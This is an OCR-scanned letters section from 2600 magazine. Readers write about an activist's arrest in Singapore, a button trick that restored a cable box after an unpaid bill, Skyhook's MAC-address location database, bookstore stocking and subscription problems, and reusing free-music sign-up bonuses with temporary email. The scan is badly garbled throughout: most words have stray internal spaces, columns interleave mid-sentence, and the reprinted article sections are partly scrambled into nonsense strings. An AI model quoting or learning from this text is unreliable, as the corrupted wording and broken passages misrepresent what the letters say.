entry cr i t i ci zi ng Si ngapore j udge Bel i nda Ang's bi ased
handl i ng of the hi gh-profi l e case of democrat i c act i vi st
Dr. Chee Soon J uan v. authori tar i an former Pr i me
Mi ni ster Lee Kuan Yew, dur i ng whi ch she favored Lee
Lord Pong and deni ed the defendant, Dr. Chee, a fai r tri al . I n

l[C

2%
[
ZnC
response to Nai r's cr i t i ci sm of the j udge on hi s bl og,
Si ngapore government offi ci al s arrested h i m on May
3 1 at the hotel where he was stayi ng. He had been i n
Si ngapore si nce May 2 6th, and, pri or t o hi s arrest, had
expected to return to hi s home i n t he Uni ted States on
the t hi rd of J une. " You may read the compl ete l etter at :
http://www. gopal an-nai r. orglmi sclfedo. ht ml .
I u nderstand t hat i n order for t he campai gn to
secure the l i berty of Gopal an Nai r successfu l l y, more
publ i ci ty is needed. And I wou l d l i ke to know if i t
wou l d be possi bl e for you and your fel l ow Ameri can
ci t i zens to start a l etter wr i t i ng campai gn to Congress
in conj uncti on with Mi ss Fedo's efforts. If possi bl e, a
s i mi l ar peti ti on to the Si ngapore embassy in Wash
i ngton woul d a l so be hel pfu l .
Si nga Crew
(cyber-activist based i n Si ngapore)
This is indeed a scary story that deserves much
more attention than it's gotten. We encourage our
readers to help spread the word. This could happen
to anyone.
Experiences
Dear 2600:
I have recentl y contracted a very " uncool " vi rus.
Thi s vi r us i s pretty i nterest i ng and has one aspect that
I had not suspected. I t wi l l i ngl y gave me the enti re
code wri tten in ABA. The code had al ready done its
work and had ri pped some regi stry data. I don't know
why but i t di d. I fi xed the regi stry wi th Tweak VI and
i t worked fi ne afterwards. Another si de effect however
was that in the Temp fol ders i t had copi ed 5000 x86
fi l es. Whi ch seemed strange. I di d not want to send i n
al l of the code even though i t i s not a l ot - onl y about
200 l i nes. I f anyone i s i nterested I wi l l send i t i n.
Mi cah
We suspect there will be some interest in this.
Dear 2600:
I pre-ordered a copy of The Best of 2600 a few
days ago, and was goi ng back to Amazon to see i f the
pri ce had changed si nce I ordered i t. . . and noti ced
that Amazon i s now sel l i ng subscr i pt i ons to the maga
zi ne for $50 a year. Seems a l i tt l e steep at about two
t i mes the shel f pri ce. Is t hi s some sort of mi stake?
drlecter
This has actually been going on for some time.
Somebody got the bright idea to subscribe to us at the
corporate rate and then try and resell the magazine
through Amazon. It's not something we can really stop
since they're not breaking any rules. But judging from
the amount of negative feedback posted on that site,
we doubt they're doing very well. And quite a few
people have indirectly found themselves browsing
through our online store because of this so it' s a weird
form of publicity we're getting out of this.
Dear 2600:
I have been readi ng your magazi ne for about a
year now and have been very i nterested in the arti
cl es. I l oved 2600 ever si nce my dad started br i ngi ng
them home f or me. After becomi ng frustrated wi th my
Cabl evi si on DVR box to record t he show at 4: 00, and
I was l ooki ng forward to watchi ng i t unt i l t he Cabl evi
si on box j ust shut off. I cal l ed my parents i mmedi atel y,
expl ai n i ng the probl em, and soon found out that they
hadn't pai d the cabl e bi l l yet.
So after a few mi nutes, I cal med down. I knew I
had fi ve mi nutes left unt i l Oprah came on. My mi ssi on
then became to hack the cabl e box so I cou l d watch
my show. I began to experi ment wi th swi tchi ng the
access cards for the boxes, swi tch i ng the box off and
on, removi ng and rei nsert i ng the access car ds unt i l
I saw the number or the current ti me, and hol di ng
down the "sel ect" button whi l e pressi ng the power
and channel up buttons.
I t was about 30 seconds unt i l t he start of the
show when I fi nal l y succeeded. After I took out the
access card, then rei nserted i t and hel d down the
sel ect button whi l e s i mul taneousl y pressi ng down
the power button, the cabl e box came back on and
worked! I started shout i ng wi th joy, and then recorded
my favori te new epi sode.
I then cal l ed my dad and began to tel l h i m how I
had hacked the cabl e box. My dad sai d, "Stop! We're
on an open l i ne. " I l aughed and got off the phone.
I fel t real l y good knowi ng that I had outsmarted
Cabl evi si on.
Note: I onl y gai ned access t o 28 channel s ( chan
nel s 02 t o 30) . Can anyone tel l me how anyt hi ng I
tri ed coul d have worked and al so why I onl y got 28
channel s back? Al so, any other gui dance or advi ce s o I
can l earn more about hacki ng woul d be appreci ated.
Shai
It sounds like you may have only gained access
to the basic cable part of your package which might
actually be the way Cable vision intended it to work
for people who are late on their bills. Frantically
pushing buttons can sometimes force certain modes
to activate so that 's often a good way to proceed in an
emergency such as yours.
Dear 2600:
I recentl y was asked to appear in a promo vi deo for
a ci ty sponsored tech offi ce space (deta i l s are bori ng) .
Bei ng the onl y person i n Charl eston, South Carol i na
who understands post- 1 998 I nternet technol ogy, they
real l y wanted to i ncl ude me as thei r spokesperson.
My onl y condi t i on was that somewhere in t hei r
footage, t hey must have a shot of my moni tor, whi ch
di spl ayed any non-pornographi c content of my
choosi ng. Contrary to thei r assumpti ons that I wou l d
have a BSoD, a pengu i n, or my "Ol sen twi ns" screen
saver on the background moni tor, I chose a pi cture
that confused t hem.
At the four second mark you wi l l see a fami l i ar
2600 i mage on my back moni tor. I apol ogi ze for the
bri ef and poor l y captured i magery.
Here's a li nk to the very erbarrassing vi deo:
h t t p : / / www. y o u t u b e . c o m/ wa t c h ? v =
cLWFZ8mdlnQ. Li ve for awh i l e and prosper some.
Noah
Thanks for the free plug.
cabl e box, I recent l y found a way to hack i t. Dear 2600:
Watchi ngTV is one of my everyday acti vi ti es a l ong I know that you are i nterested i n knowi ng what
wi t h hacki ng. Cabl evi si on i s my current provi der and retai l ers who sel l your magazi ne are up to so I woul d
my favor i te unt i l now. One day I came home from l i ke to rel ate t hi s story. On Wednesday, August 6th I
school expect i ng to watch a new epi sode of Oprah vi si ted a l ocal Barnes and Nobl e bookstore ( Pi ttsfi el d,
but soon became frustrated. I started to set up my Massachusetts - store #2661 ) wh i l e doi ng some errands
ulumn 2dl[C

i n order to pi ck up two of my favori te peri odi cal s, the

fi rst one bei ng Mojo magazi ne and t he second one
bei ng 2600. Th i s store has been my source for your
magazi ne for a number of years now and I 've never
had a probl em buyi ng i t there. On t hi s vi si t, however,
I cou l d not fi nd your magazi ne. I went so far as to use
t he l i tt l e round step stool to stand on i n order to l ook
between the magazi nes on t he topmost rack, t hi nki ng
for some reason maybe 2600 was hi dden i n there
or somehow mi spl aced. No l uck. I suspected that
perhaps the store was j ust between i ssues and hadn't
recei ved or gotten around to putt i ng t he l atest i ssue
up. I eventua l l y asked an empl oyee who l ooked up
both magazi nes i n the store computer, confi rmed they
s houl d have both i n t he store, and promptl y found the
fi rst one easi l y. He cou l d not fi nd 2600, however, and
was at a l oss to understand why. I took one l ast hard
l ook around the magazi ne bi ns mysel f and then gave
up empty handed so to speak.
Lucki l y, j ust two weeks l ater I found mysel f back
i n that town and was abl e to swi ng by t he same
Barnes and Nobl e. When I went up to the magazi ne
racks wher e your magazi ne typi cal l y si ts, I saw a
di fferent empl oyee pu l l i ng magazi nes off the shel ves
and stacki ng them neatl y on a bench. He saw me
snoopi ng about and crani ng my neck and asked me
what I was l ooki ng for. I tol d h i m I was there l ast week
and cou l dn't fi nd 2600. He sai d, "That's because i t's
h i dden ." Then he reached up beh i nd a tal l computer
magazi ne and pul l ed a fresh Summer 2008 copy of
2600 down for me. I know for a fact t hey weren't there
two weeks ago because t he spot where he pul l ed i t
from i s one where I was l ooki ng wh i l e standi ng on
the step stool . He went on to say that "2600 has to be
concea l ed now." I asked why that was s i nce I never
had troubl e f i ndi ng i t i n the past. He sai d the di recti ve
"came down from corporate, that t hey don't want that
part i cul ar magazi ne showi ng anymore. " He added
that they woul d probabl y change t hei r t une when they
rea l i zed that they weren' t sel l i ng as many. I sai d that I
hoped he was ri ght.
FYI , they di d r i ng my 2600 purchase up correct l y
as i t appears on my recei pt as: "2 600 HACKER QUAR
TERLY, 072 52 7483 1 586, ( 1 @ 6. 25) " .
Sl mOnS3z
We know even without asking that such a directive
would make no sense at all. We don 't know what kind
of games are going on at that store but it wouldn't be
the first time an employee did something crazy to one
of our issues. We thank you for continuing to ensure
that we're findable in your local stores. If this kind of
thing continues, we suggest you speak to the manager
about it.
Dear 2600:
Hi . I ' m an l l -year-ol d boy in Sweden. I 've heard
about a new hacker that ca l l s h i msel f Zero Cool . He's
a l so 1 1 . Hi s father is from Kosovo and now he's at
war wi t h some other Al bani an hackers: Dr. Go, @nt i
Vi ru ! $, Mat r i x, Un i cracker, and Grani t.
Dr. Go i s 1 5- 1 6 years ol d, he's the onl y one of
these crackers who's got a heart. Hi s fri end i s @nt i
Vi r u ! $, he cracked an FBI page a few days ago, he
used t o be fri end wi th Mat r i x but then t hey became
enemi es, and he's about 1 80 cm.
@nt i -Vi ru ! $ i s al so 1 5- 1 6 years ol d, he's the one
who has t he col dest heart, he made Matri x's nose get
bl oody - haha i t's rea l l y funny. I can tel l you about it
l i n t h e end. He's about 1 64 c m.
Matri x got hi s nose bl oody from @nt i -Vi ru ! $, h e
used t o be fri ends wi th Dr. Go bu t i t di dn't get s o good.
He's about 1 80 cm and he's fri end's wi th Uni cracker.
Matr i x is ra nked Number One on the hacker l i st i n
Kosovo.
I don't have any i nfo on Uni cracker.
Zero Cool is 1 1 years ol d, he's 1 63 cm. , and l i ves
somewhere in Sweden.
Here i s t he story about @nti -Vi ru ! $, Dr. Go, Matri x,
and Matr i x's l i tt l e brother: @nti -Vi ru ! $ gave a l ol l i pop
to Matri x's l i tt l e brother and hi s phone to record when
they beat up hi s brother. ( Matri x's l i ttl e brother i s
1 1 - 1 2 years ol d. ) @nt i -Vi ru ! $ hi t Matri x wi th hi s fi st
and broke h i s gl asses and then Matr i x started bl eedi ng
from the nos e and Matri x's l i ttl e brother l ooked at
t hem wi t h confused and s urpri sed eyes. Then @nt i
Vi ru ! $ l ooked at Dr. Go and sai d, "What t he hel l are
you doi ng? " (they are real l y j ust speaki ng Al bani an
at t he ti me) and he kept sayi ng, "Why di d you hi t
h i m? " Then @nti -Vi ru ! $ ki cked h i m and Matri x started
runni ng and @nti - Vi ru ! $ and Dr. Go ran after h i m ( al so
Matr i x's l i tt l e brother) . Then when Matr i x was about to
go i nto hi s bi g house (fi rst he had to pass the gate to
come to the yard), @nt i -vi ru ! $ ki cked h i m in the ass,
then Matr i x l et hi s l i ttl e brother go i n and they started
swear i ng at each other (Matr i x on one s i de of the gate
and @nt i -vi ru ! $ on the other) . Then Matri x started
wi th, "I f#cked your mum, I f#cked you up. " Then @
nt i -vi ru ! $ sai d, "Wel l come out then ! " Then Matri x
sai d, "No way, I ' m never goi ng outsi de aga i n. " Then
Matri x turned to hi s l i ttl e brother and started swear i ng
at hi m and at hi s l ol l i pop l i ke: "You and your f#cki ng
l ol l i pop! "
Cracker Spion
Well, there's at least one book here and without
doubt a major motion picture as well. It's clear to see
what makes these people the talented hackers that
they are. Why can 't the rest of the world understand
this ? We hope in the next installment to find out why
Zero Cool went to war and who the hell Granit is. Truly
faSCinating stuff
The Best of ZO
Dear 2600:
Bei ng a l i fet i me subscri ber, is The Best of 2600
book free for me or do I get a di scount of some ki nd? I
di dn't fi nd any rel evant i nformati on perta i n i ng to t hi s
so I fi gured I 'd drop you a l i ne and s ee i f you had any
answers or brought the questi on up t o someone who
may . . . .
Hans
There are no discounts from us as we're not the
ones publishing it. But you can certainly hunt around
and find it at discounted prices in various places,
online and off
Dear 2600:
Any chance that your new book The Best of 2600
wi l l be made ava i l abl e for downl oad on Amazon
Ki ndl e? For those of us wi th ol d eyes, the abi l i ty to
i ncrease the font si ze of the text wou l d be a rea l pl us.
Keep up t he good work.
a
[C2
mi kef
It' certainly possible if the
p
ublishers go for it.
2
%a
[
aZnC
Dear 2600:
After a severa l year h i atus from readi ng and wr i t i ng
t o your magazi ne, I t hought a bi t of nosta l gi a was i n
order and I opened The Bf'st of 2600 wh i l e browsi ng
my l oca l Barnes and Nobl e. Lo and behol d, I fl i pped
to page 704 and was greeted by "Fun Wi th Radi o
Shack," an art i cl e I wrote back i n 2001 as "Cunni ng
Li ngui st," my nom de pl ume ! the t i me. I coul dn't
bel i eve how i mmature my techni cal wr i t i ng was! ( I
guess i t's a good th i ng I can recogni ze that now. )
Thanks for the memori es, and for putt i ng my
arti cl e i n your mag - I mean, book!
Jef Strauss
Formerly known as "Cunni ng Li nguist"
Your immortality has now been achieved.
Problems
Dear 2600:
I have not recei ved any i ssue after my renewa l ,
i . e. , spri ng onwards.
Vikas
New Del hi
This was most likely a postal issue. We've
forwarded your mail to the subscription department
as you sent this to the letters department. (Yes, they
are diferent people entirely. ) That address, inciden
tally is subs@2600. com.
Dear 2600:
He
y
, I ' m super exci ted that you pi cked the art i cl e I
wrote that appears ri ght at the begi nni ng of the maga
zi ne. On a negat i ve note, I was di sappoi nted to see
several grammat i cal and spel l i ng errors i n the General
I nformat i on secti on. That sect i on was cl ear l y edi ted
for s i ze but I found mysel f struggl i ng to understand
what the paragraph was sayi ng because t her e were
not onl y spel li ng errors but compl ete changes of
words. Some exampl es of that are "aperforms" i nstead
of "access poi nt" and "I otabase" i nstead of " l ocate me
through thei r servi ce. " Pl ease don' t feel I am attacki ng
you . I understand that edi t i ng a magazi ne l i ke t hi s
woul d be t i me consumi ng and the occasi onal spel l i ng
mi stake is to be accepted. | feel as thou
g
h my art i cl e
i s much more di ffi cul t t o understand and i t makes me
l ook l i ke a poor wri ter. On a happi er note, I can't wai t
t o get The Best of 2600 book. Agai n, t hank you for
pu51 i sh i ng my art i cl e. I made a vi deo demonstrat i on
as wel l whi ch can be found at:
http: //thebmxr. googl epages. com/home2
Terry Stenvold
We're really sorry about how that article got
majorly messed up in a couple of places. This was the
result of a computer error that took place after the
proofreading process. We also neglected to mention
the availability of source code from the article in our
code repository (http://www2600. comlcode).
We're reprinting the affected sections from the
article which appeared on page 6 and Z of 25: 2. The
paragraph un
d
er "General In
f
ormation " should have
rea
c
as follows (missing sections in bold) :
"As you may know there is a new feature included
in the Google maps 1. 1 . 3 update for the Apple
Dear 2600:
iPhone and iPod Touch; the "Locate Me" feature.
After 33 pl us years of probl em sol vi ng in the wor l d The new feature i s provided by another company
of professi onal theater audi o I accept that perfecti on
called Skyhook Wireless (http: //www.skyhookwire
is not atta i nabl e. It i s a di rect i on. Sti l l , one stumbl es
less. coml) . Skyhook's system is named WPS, for
h H k Q I d h' k h h
Wireless Positioning System, and locates users by
upon t e ac er uarter y an t i n S t at per aps
knowing the location of their wireless aCCC$$ jOnf.
t hi s publ i cati on, wi t h an enormous amount of fasci -
l nanOICrCOnfCXf, "Wl al$O $ a fCrm COnCd by
nat i ng subj ects, wi l l be perfect. It seems that I have
fhCW-MAmanCC fOmCan "W-l lrOfCCfCd Cfuj. "
not real l y accepted that perfecti on is not atta i nabl e.
[hOOk performs their location features i n a unique
Expectat i ons cause one to stumbl e.
way because WPS requires knowledge of t he specific
J ust one edi t i on of 2600 and I was captured.
geographic location of individual aCCC$$ jOnf$. HC
Vol u me 24 Number 4 moved me i nto the 2600 mode OOkMCb$fC $fafC$ fhaf nlOrmafOn $ ObfanCd
of t hi nki ng. I was home. bydCjlOyn_ hundrCd$ Ol dafa $jCCah$f$ MhO $Can
What to do next, besi des subscri be. I ' l l get some and OC fC aCCC$$ jOnf$ u$n_ jrOjrCfary $Can-
back i ssues to keep me cooki n' unt i l the fi rst i ssue of nn_ vChCC$. kyhOOk dCjlOy$ ajjrOXmafCly fMO
my subscri pti on arri ves here i n BFE. hundrCd MardrvCr$ fO $Cau and locate access points
I ordered four back i ssues. The USPS had gotten i t
and they then append this information t o a large refer-
ri ght th i s t i me and del i vered my mai l to me and not
ence database. The problem with the system, other
to some person at an address di fferent from mi ne. Joy
than knowin
g
someone has driven by your house or
i n Mudvi l l e.
business and added your AP's information to a large
Tear i ng open the package I fi nd di sappoi ntment,
database, is that a third party can then locate you with
a functi on of expectati on. There was no Summer
only your MAC address. I recently emailed Skyhook
2007 and two of the Autumn 2007. Pi ssed, I cal cul ate
and asked if there is a way for people to lOCafC mC
sendi ng back the extra Autumn 2007 and demandi ng
fhrOu_h fhCr $CrvCC. hCy rC$jOndCd, "nO, n nO
a correcti on in the order.
May Can anyOnC fraO yOur lOCafOn. HC $CCOnd
No! I ' l l j ust send the extra i ssue to a fr i end (a
QuC$fOn l a$kCd Ma$ l f $ jO$$blC fO havC $OmC-
real computer person, u n l i ke mysel f) . Sal vat i on ! The
OnC'$AladdrC$$ rCmOvCdlrOm fhCr dafaba$C. HC
]
f f II I d
rC$jOndCd, $ayn_ fhaf fhCy "CannOf rCmOvC ndi-
acceptance O i mper ecti on a ows me to re ax an
vualaCCC$$jOnf$. . . CvCryaCCC$$jOnfbydClnfOn
enj oy 2600 whi l e scor i ng some Karmi c poi nts i n
brOadCa$f$ a radO bCaCOn. . . . HC Only May fO $fOj
hel pi ng a fri end enj oy the goodi es.
anaCCC$$ jOnf lrOm brOadCa$fn_ f$ [rC$CnCC $fO
And so it goes. Thanks for putt i ng out a publ i ca-
unjlu_f . . . . MCdOn'faCfuahydCnfl fhC lOCafOn Ol
t i on whi ch can sti mul ate creati vi ty, stoke the fi res of
aCCC$$jOnf$,]u$f fhC $_nal$ fhaf ICy CrCafC. H$
acti on taki ng, whi l e remi ndi ng one to l i ghten up and
nlOrmafOn $jarfCularly un$Cffhn_ $nCC kyhOOk
accept that perfecti on is a di rect i on, one that 2600 i s
Cam$nOOfhCr May fO rCmOvC anAl'$ addrC$$ lrOm
a l ready travel i ng, al bei t
wi t h bumps al ong the way.
fhC dafabase besides un
p
lugging the access point. "
I wi sh 2600 success,
happi ness i n what you do
In addition
, the last line of the "Step 1 " paragraph
and urge you " l I i gi t i mi non carborundum" ( don't l et
was truncated and should read:
the bastards wear you down) .
"Gaining access t o a computer through a Trojan
Daniel
horse and running the command "arp -a " Mh al$O
We applaud your positive and enlightened
ahOM $OmCOnC fO Obfan a %AL addrC$$ On a
outlook on life's little setbacks but you really should WndOM$ maChnC.
let us know if we ever screw up like that and we'll be In addition, there was a slight mangling of text on
happy to make things right. page 55 in the "Bank of America " artic
l
e. The affected
ulumn 2d
l
[CJ
section should have read:
"The " DAAAAAAAAAAAAAA$fhCluCrCdfCar0
numbCr Ol fhC aCCOunf. bCCau$C fh$ nlOrmafOn $
n fhC URL, f $ $fOrCd n $CrvCr lO_$. lf $ al$O kept
in the web browser's history, where it can be seen
by future users of the same computer. This is where
the ability to read other customers ' statements comes
into play. "
Again, we're very sorry this foulup happened and
will take extra precautions to ensure that no repeats
of this occur.
Dear 2600:
A stran
g
e t hi ng happened to me recent l y. I
cou l dn't fi nd a j ob. I t's not l i ke I coul dn't fi nd some
part ti me gi g s l i ngi ng burgers, but I was l ooki ng for
a job. I wanted somet hi ng where I coul d get pai d to
do the t hi ngs I enj oyed. And that j ust happened to
be worki ng on my computer wi th the so
f
ware that
makes regul ar users confused. I l ooked i n the cl as
si fi ed ads, but everyt hi ng I cou l d fi nd was out of my
reach. Al l these posi ti ons asked for the same t hi ng: a
degree and experi ence. Now these are t hi ngs that I
don't have, not for a l ack of tryi ng, but more for a l ack
of money and the necessary attenti on span for general
educati on cl asses at my l ocal communi ty col l ege.
So after a semester or two ( I had l ost count after so
many years have passed) and some years tryi ng to
p
ass as a factory worker, I agai n tri ed to fi nd work
In I T ei ther as an admi n or j ust the poor dupe who
had to make sure the temperature of the server room
was ri ght. But they a l l asked for that degree. I coul dn't
even fi nd one that asked for a cert i fi cat i on. Was that
a pl an that fai l ed i n the I T worl d? So I tri ed to submi t
my resume as i t was, maki ng sure to note that I taught
mysel f everyt hi ng they wou l dn't i n hi gh school . And i t
got me nowhere. Am I to bel i eve that the onl y pl ace I
can l earn is in a cl assroom, wast i ng two or more years
of my l i fe l earni ng the s l udge that won't be necessary
by the t i me I fi ni s h my school i ng? And besi des, I had
taught mysel f the basi cs of a programmi ng l anguage
in a matter of a few months. I ' m even worki ng on
projects usi ng t hi s l anguage, t hi ngs to make my l i fe
r un smoot hl y. But nobody takes it ser i ousl y because I
don't have a pi ece of paper that says I can do i t. What
ever happened to the days when a person who knew
how to use a computer had a job before even l eavi ng
hi gh school ? Granted, I am a bi t ol d, bei ng 2 7, but I
shou l d sti l l be abl e to fi nd a decent j ob wor ki ng i n the
fi el d wi thout a degree. And I ' m not about to waste two
more years of my l i fe wai t i ng for a job to come i n.
Another strange t hi ng happened t o me recentl y.
I was tal ki ng about how I needed to work on my
computer to one of my fel l ow burger f l i ppers, and she
asked me i f I was a gamer. Where i s i t wri tten that i n
order to work on your computer, you have to be a
gamer? I hate computer games. I u nderstand that the
average user has no i dea how the I nternet works, how
web pages get to thei r screen, but j ust because I know
more about computers than the average user doesn't
mean I am a gamer. I am a hacker. I have al ways been
one and I wi l l al ways be one.
Where have a l l the true computer nerds gone?
What happened to the days when bei ng a nerd meant
that you cou l d program a computer to do vari ous
t asks? Why do I have to spend years of my l i fe bei ng
taught somet hi ng I can teach mysel f i n two years?
Why i s i t that i n order to be good wi th computers, I
have to pl ay games? I ' m t i red of these t hi ngs. I wi sh for
the ol d days, when bei ng good wi t h computers kept
you in an el i te group of nerds and geeks.
Requests
Dear 2600:
Cou l d you i ndex a l i st of subj ects covered by a l l
i ssues s o that I coul d search them a n d fi nd ou t i f and
when you have wri tten about somethi ng I am i nter
ested i n ? Thanks!
John
If we could snap our fingers and have this done,
we would love it. But putting together an index with
all of the material we have would take an eternity.
Right now your best bet is to search for keywords
in titles on our online store (http: //store. 2600. com) .
Maybe someday we can make this happen.
Dear 2600:
Does anyone at 2600 have an ol d Hack- Tic demon
di al er? Peopl e at Hack-tic cl ai m the software source i s
"mi ssi ng. " Who has the source code for the Motorol a
chi p? Someone must have i t.
xemai l
The call i s out.
Dear 2600:
Can you guys recommend other zi nes of the
same i l k? My t hi rst i s endl ess. Al so, I fi nd your back
i ssue order i ng qui te perpl exi ng. I can order two years
for $35 ($40 normal l y) or fi ve years for $85 ( $1 00
normal l y) . That breaks down to $ 1 7. 50 per year for
two, or $ 1 7 for five . . . hardl y a savi ngs! I mean, I want
an actual bul k di scount for order i ng more! pl ease
advi se.
Al so, your new book sort of gave me an i dea. Why
not publ i s h a speci al mag you have to buy separatel y
t hat i s a best of the previ ous t wo years? You cou l d
publ i s h i t year l y, and t hen art i cl es from each year
wou l d get two chances to make i t i nto the best of the
past two years mag. I 'd buy!
E
That would be something else that requires quite
a bit of coordination. Getting the book out was a
real milestone and we hope that satisfies people for
a while. As for our discounts, we can only go so far.
Printing and postage costs are constantly going up so
there' a limit to how much we can slash, even on
bulk orders. And, to answer your first question, at the
moment we're unaware of any other printed maga
zine that does what we do.
Contributions
Dear 2600:
I made some usefu l programs whi ch may be worth
menti oni ng:
A keyl ogger-detector for detecti ng hardware
keyl oggers: https:llssl si tes. de/www. true-random. com/
homepage/projects/anon_i net/heartbeat++. c
A randomi zer for randomi zi ng I PV4 numbers i n
( l og)fi l es ( because I ' m r unni ng a TOR server at home) :
https:llssl si tes. de/www. true-random. com/homepage/
proj ects/l i beral/randomi ze. ht ml https: llsourceforge.
net/projects/randomi ze
By the way, I ' m l ooki ng for publ i c key steganog
raphy programs but cou l d fi nd none. Do you know
some?
Dr. Rolf Freitag
Psion the GateKeeper
l[C 2%
[
ZnC
There' plenty of discussion about public key steg
anography in various places on the net but we don't
know of specific programs either. We imagine our
readers may be able to find out more.
Dear 2600:
I ' m not much of a hacker, but I do read the maga
zi nes. Anyway, I saw the art i cl e i n the s ummer of ' 07
about gett i ng free musi c wi th si gn up bonuses, and
I t hought about how sai d process cou l d be i mproved.
1 ) The si tes l i sted can remember your I P, and they
onl y gi ve you one track on si gn up, so I found l omoi o.
l omoi o doesn't remember your I P and gi ves you two
free tracks upon si gn up.
2 ) Wi t h t he process i n t he arti cl e, you have t o wa i t
ten mi nutes for the si te to reset your account, and i t
a l so remembers your I P, t hus l eadi ng t o the di scovery
of pookmai l . com. I t a l l ows you to create a temporary
emai l account for any amount of t i me, and you can
l ook i n on ot her peopl e's stuff who used i t before
(very funny, peopl e si gn up to cheap porn si tes wi th
pookmai l - j ust read the subj ect l i nes of the mai l and
l augh) .
bi uSKR33N
Observations
Dear 2600:
I hope I ' m not poi nt i ng out the obvi ous when
say t hi s, but wi th i n the past two i ssues I have noti ced
someth i ng odd. I n the tabl e of contents of 2 5 : 1 there
seems to be a sma l l reference to George Orwel l 's 1 984
i n whi ch ri ght u nderneath the sponge i t says: "We s hal l
meet i n t he pl ace where there i s no darkness. " I then
cou l dn't hel p but noti ce that for the adverti sement of
your new book on page 64 of vol ume 2 5 : 2 the author
i s Emmanuel Gol dstei n. I hope thi s i s n't someth i ng
you have been doi ng f or a wh i l e or some ki nd of s i l l y
coi nci dence, s i nce I am a fai r l y new reader. I woul d
j ust l i ke t o t hank you for keepi ng t hi s magazi ne one of
the most enj oyabl e magazi nes I have ever read, and I
hope that you wi l l never get r i d of the pol i t i cal aspect
of t hi s magazi ne, s i nce i t's one of my favori te parts !
John
Dear 2600:
I t's an i nteresti ng fact that in Germany, " Hacker"
i s a common l ast name. So i n Germany we have (at
l east) one mayor wi th the name German Hacker:
http://www.german-hacker. de!
He has a doctor's degree.
Dr. No
What ' even more interesting is that his first name
is literally German.
Dear 2600:
In my arti cl e, "Spi r i ts 2000 I nsecu ri ty" that was
publ i shed in 2 5 : 2 , I real i zed that there was an error.
I had sai d that you onl y need emp. cdx to be abl e to
vi ew the database in Vi sual Fox Pro, but i f I remember
correct l y, you need emp. dat and emp. fpt as wel l . Both
of these fi l es can be found i n the same di rectory as
emp. cdx though.
drl ecter
Dear 2600:
Congratu l at i ons on The Last HOPE. From what I
hear, it was a great success . . . and it pai ned me great l y
t o not have the pl easure of attendi ng. To the poi nt :
Recentl y, I had purchased a fai r number of ol d 2600
magazi nes from eBay, rangi ng from the years of 1 998
to 2000 and al l i n excel l ent condi ti on. Looki ng upon
these i ssues as br i cks of knowl edge, I am sti l l readi ng
t hem and fi nd them very i nteresti ng, yet I have found
a recur r i ng topi c pop i nto my head after each art i cl e.
Back i n the l ate 90s, the hacker communi ty seemed
to be more bol d and open to i deas. I know that the
I nternet was growi ng rapi dl y and had everyone's
heads t ur ni ng, al ong wi th the spreadi ng popul ar i ty
of Wi ndows 98 and NT, but there were n umerous
references that were publ i shed that pertai ned to
government secur i ty as opposed to the corporate
secur i ty that I see today. Al so, there seemed to be
more how-to's and step-by-step expl oi ts in 2600. I am
by no means bas hi ng t hi s magazi ne . . . I am an avi d
subscri ber. But what i s i t wi th hackers today? Ar e they
scared to post government papers and frequenci es?
Or was i t the whol e " Free Kevi n" propaganda that had
t hei r bl ood boi l i ng? These ki nds of thoughts conti nue
t o fl ood my head as I read these pages of h i story . . . but
I woul d l i ke t o hear from everyone whether or not the
open- mi nded t hi nki ng of the hacker communi ty has
changed at al l wi th i n the past decade. Thanks for your
work, and keep u p the great magazi ne!
PriesT
Attitudes definitely change over the years and
that ' something you can notice by poring through old
material and getting into the spirit. This is also how
you learn and figure out ways of applying past values
to the present and future. Oftentimes that 's where the
answer lies.
Dear 2600:
Raytheon'S I nternet secur i ty tra i n i ng provi des
some rather i nterest i ng defi ni t i ons:
" Hacker - A ' hacker' i s anyone who attempts
any ki nd of i l l egal computer-based acti vi ty i ncl udi ng
breaki ng i nto someone el se's i nformati on system. And
the I nternet i s a hacker's paradi se. I t cou l d potenti a l l y
gi ve hackers open access to any i nformati on hel d on
Raytheon's i nformati on system. Raytheon uses a wi de
range of access control s i n order to mi ni mi ze the
ri sks of thi s occur r i ng. Thi s i s often done ' behi nd-the
scenes' wi thout you even bei ng aware. "
"Soci al Engi neer i ng - Soci al engi neer i ng i s the
term for descr i bi ng an i ntrusi on that rel i es heavi l y on
human i nteracti on and often i nvol ves t r i cki ng peopl e
i nto breaki ng nor mal secur i ty procedures. Soci al
engi neeri ng can take pl ace face-to-face, over the
phone and on- l i ne, or any combi nati on thereof. So a
soci al engi neer is a cr i mi nal who uses h i ghl y devel
oped soci al ski l l s i ncl udi ng mani pul at i on, i ngrati a
ti on, i mpersonati on, psychol ogi cal tri cks and a wi de
vari ety of tool s to persuade you to reveal i nformati on
to whi ch they have no ri ght or authori zed access. "
Oddlyeven
Dear 2600:
I want to t hank you for another great HOPE. It
makes me feel warm and fuzzy i nsi de knowi ng not
everyone is a phi l i st i ne automaton fol l owi ng the
masses. Whi l e thi s was onl y my second ti me at a HOPE
conference, I noti ced some changes between HOPE
Number Si x and The Last HOPE and I was wonderi ng
ulumn2d
l
[
C

if you have noti ced the same t hi ngs over your l onger
frame of reference. Fi rst, the crowd seemed much
more di verse t hi s t i me (for exampl e, more women) .
Th i s i s a good th i ng ( not j ust more women, but di ver
si ty in general ) . I th i nk the more di verse the hacker
communi ty gets, the better, because i t means you are
breaki ng down the hacker stereotype created by the
medi a. Another t hi ng I noti ced was a l ot more peopl e!
I remember two years ago some ta l ks bei ng standi ng
room onl y, but t hi s year it seemed l i ke al most every
th i ng i n Hopper was standi ng room onl y. Perhaps the
conference has reached cr i t i cal mass ! ? What do you
thi nk about gett i ng a l arger venue? I l ove Hotel Penn
j ust as much as t he next guy, but i t seems t o me the
conference may have outgrown i t. Then agai n, I am
speaki ng from a l i mi ted frame of reference.
SnOOpy
We've definitely grown in many ways and this
conference was our biggest yet. But we still have a ton
of space in the hotel and even some additional space
that we have yet to use. We also want to avoid getting
too big since that would ruin the magic.
Dear 2600:
A whi l e back, I posted my resume and responded
to a few l i st i ngs on a Uni ted Arab E mi rates I T job
websi te. A few days l ater, upon pl aci ng cel l phone
cal l s, I wou l d hear a strange recur r i ng tone, a beepi ng
noi se every three seconds (cel l was on my resume),
so I made sure to keep my conversati ons l egi t, never
menti oni ng warez, techni cal , etc. . . . I then conferred
wi th a fri end of a fri end doi ng government work who,
after several WEpks, sai d that the government cou l d
be l i sten i ng i n and t hat I cou l d have rai sed a red fl ag
due to my posti ng.
I cannot confi rm any of thi s after much Googl i ng
and real i ze t hat he cou l d be pu l l i ng my l eg. Has
anyone heard of t hi s ki nd of th i ng!
